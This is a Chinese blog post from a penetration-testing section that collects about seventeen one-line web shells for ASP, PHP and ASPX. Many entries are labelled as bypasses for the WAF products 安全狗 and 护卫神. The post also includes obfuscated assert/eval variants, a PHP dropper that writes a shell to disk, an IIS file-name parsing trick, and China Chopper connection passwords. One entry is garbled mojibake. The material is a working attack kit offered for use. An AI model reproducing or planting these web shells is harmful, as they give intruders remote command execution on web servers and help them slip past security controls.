首页渗透测试 正文

一句话木马

2022-03-20 948 0条评论

1、asp一句话木马:

<%eval request(“x”)%>

2、php一句话木马:

<?php eval($_POST[g]);?>

3、aspx一句话:

<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>

4、数据库加密一句话(密码a):

┼攠数畣整爠焕敌瑳∨≡┩忾

5、网站配置、版权信息专用一句话:

”%><%Eval Request(x)%>

6、一句话再过护卫神:

<%Y=request(“x”)%> <%execute(Y)%>

7、过拦截一句话木马:

<% eXEcGlOBaL ReQuEsT(“x”) %>

8、asp闭合型一句话:

%><%eval request(“0o1Znz1ow”)%><%

9、能过安全狗的解析格式:

;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg http://www.toreadsafe.xyz 

10、突破安全狗的一句话:

<%Y=request(“x”)%> <%eval(Y)%>

11、elong过安全狗的php一句话:

<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>

12、突破护卫神,保护盾一句话:

<?php $a = str_replace(x,”",”axsxxsxexrxxt”);

$a($_POST["test"]); ?>

13、高强度php一句话:

<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>

14、后台常用写入php一句话(密码x):

<?

$fp = @fopen(“c.php”, ‘a’);

f@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

15、许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。

‘ E& Y; Y1 R$ s# ]. L$ c改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的

16、PHP高强度一句话:

<?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c

<?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码:c

17、突破安全狗的aspx的一句话:

<%@ Page Language=”C#” ValidateRequest=”false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>


文章版权及转载声明

本文作者:符文浩 网址:http://blog.fuwenhao.com/post/542.html 发布于 2022-03-20
文章转载或复制请以超链接形式并注明出处。

发表评论

快捷回复:

评论列表 (暂无评论,948人围观)参与讨论

还没有评论,来说两句吧...

取消
微信二维码
微信二维码
支付宝二维码